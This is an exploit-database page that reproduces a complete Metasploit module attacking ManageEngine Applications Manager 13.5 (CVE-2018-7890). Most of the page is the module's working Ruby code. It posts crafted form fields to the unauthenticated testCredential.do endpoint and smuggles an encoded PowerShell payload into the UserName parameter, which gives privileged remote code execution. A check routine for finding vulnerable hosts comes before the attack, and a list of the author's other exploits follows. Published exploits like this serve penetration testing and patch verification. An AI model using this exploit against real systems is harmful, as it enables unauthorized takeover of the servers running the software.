Search for hundreds of thousands of exploits

"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)"

Author

Exploit author

"Mehmet Ince"

Platform

Exploit platform

java

Release date

Exploit published date

2018-03-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ManageEngine Applications Manager Remote Code Execution",
      'Description'    => %q{
        This module exploits command injection vulnerability in the ManageEngine Application Manager product.
        An unauthenticated user can execute a operating system command under the context of privileged user.

        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
        by accessing given system. This endpoint calls a several internal classes and then executes powershell script
        without validating user supplied parameter when the given system is OfficeSharePointServer.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['CVE', '2018-7890'],
          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
        ],
      'DefaultOptions'  =>
        {
          'WfsDelay' => 10,
          'RPORT' => 9090
        },
      'Payload' =>
        {
          'BadChars' => "\x22"
        },
      'Platform'       => ['win'],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'         => [ ['Automatic', {}] ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 7 2018',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(10),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(3),
        'UserName' => Rex::Text.rand_text_alpha(3)
      }
    })
    if res && res.body.include?('Kindly check the credentials and try again')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit

    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)

    print_status('Triggering the vulnerability')

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(10),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(3),
        'UserName' => "$(#{p})"
      }
    })

  end
end
Release DateTitleTypePlatformAuthor
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-04-06"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2019-01-07"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2018-07-24"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2018-06-26"Liferay Portal < 7.0.4 - Server-Side Request Forgery"webappsjava"Mehmet Ince"
2018-03-12"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)"webappsjava"Mehmet Ince"
2018-01-04"Xplico - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-10-11"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-10-11"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-09-19"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)"webappslinux"Mehmet Ince"
2017-09-12"osTicket 1.10 - SQL Injection (PoC)"webappsphp"Mehmet Ince"
2017-06-26"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-05-09"Crypttech CryptoLog - Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-03-24"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)"remotepython"Mehmet Ince"
2017-03-17"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)"remotelinux"Mehmet Ince"
2017-01-31"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)"webappsphp"Mehmet Ince"
2017-01-15"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2017-01-08"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities"webappsjava"Mehmet Ince"
2016-09-21"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-25"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)"webappsphp"Mehmet Ince"
2016-07-20"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)"remotephp"Mehmet Ince"
2016-07-11"Tiki Wiki 15.1 - File Upload (Metasploit)"remotephp"Mehmet Ince"
2016-06-27"BigTree CMS 4.2.11 - SQL Injection"webappsphp"Mehmet Ince"
2016-06-15"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities"webappsphp"Mehmet Ince"
2016-05-24"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection"webappsasp"Mehmet Ince"
2014-04-24"Bonefire 0.7.1 - Reinstall Admin Account"webappsphp"Mehmet Ince"
2014-04-22"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key"webappsphp"Mehmet Ince"
2012-05-01"WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting"webappsphp"Mehmet Ince"
2012-04-27"SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection"webappsphp"Mehmet Ince"
2012-04-26"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities"webappsphp"Mehmet Ince"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44274/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.